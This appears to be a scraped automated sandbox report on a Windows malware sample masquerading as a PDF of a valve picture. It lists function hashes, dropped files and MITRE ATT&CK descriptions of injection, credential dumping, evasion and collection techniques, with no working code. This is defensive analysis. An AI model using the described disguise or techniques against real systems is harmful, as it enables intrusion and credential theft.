Snapshot File: hcaresult_1_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: a5d3b34e3776987ba34de3dff3cb517df92ff8083264d5792a65a6bbf734643e
Instruction ID: 89786724ebb659d0e483297202bd22ba215eea61f8582140e7d0cf87e130d428
Opcode Fuzzy Hash: a5d3b34e3776987ba34de3dff3cb517df92ff8083264d5792a65a6bbf734643e
Instruction Fuzzy Hash: 4321A6F5A0430E9FEF254E68C524676BBF4AF41650F6844ABC84D8B282D731E445CBE1

Analysis Process: Slringsnettets.exePID: 2212, Parent PID: 5316COMMON

Execution Graph

Execution Coverage:	45.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	100%
Total number of Nodes:	4
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 028685CC Relevance: 3.1, APIs: 2, Instructions: 61
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000005), ref: 02868638

Memory Dump Source

Source File: 00000006.00000002.2900539156.00000000021EF000.00000040.00000400.00020000.00000000.sdmp, Offset: 021EF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_21ef000_Slringsnettets.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 01ed53f80475c5bf8068d9bff0bdc73e6e49218a106b7e4ac476240a4603af1e
Instruction ID: ac8aeeff4ff093e004c3265d8b9e3bffb7563ad709a6f19557945a37bf422a67
Opcode Fuzzy Hash: 01ed53f80475c5bf8068d9bff0bdc73e6e49218a106b7e4ac476240a4603af1e
Instruction Fuzzy Hash: 2D1121B91403018FEB045B38CA5CBEA76A6EF153A8F498298DD598B4E6E364C884CF41

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PTFE Coated Butterfly Valve Picture#U00b7pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Donkraftes197.sax

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Vehftes.Red

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Filmkundskabers209.kon

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness\Henseende.ska

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness\Hospitaliseret.lba

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness\extravagence.txt

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness\intertieing.hyd

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness\kannevassers.esk

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness\overvurderingens.syn

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness\scattier.con

C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

C:\Users\user\AppData\Local\Temp\Slringsnettets.exe:Zone.Identifier

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0zeqyjfx.lzb.psm1

Windows Analysis Report
PTFE Coated Butterfly Valve Picture#U00b7pdf.exe

Function 004030D9 Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 357
stringcomfileCOMMON

Function 00405050 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 00405D1B Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 199
stringCOMMON

Function 0040559B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 0040205E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Function 00403A0B Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 00403679 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre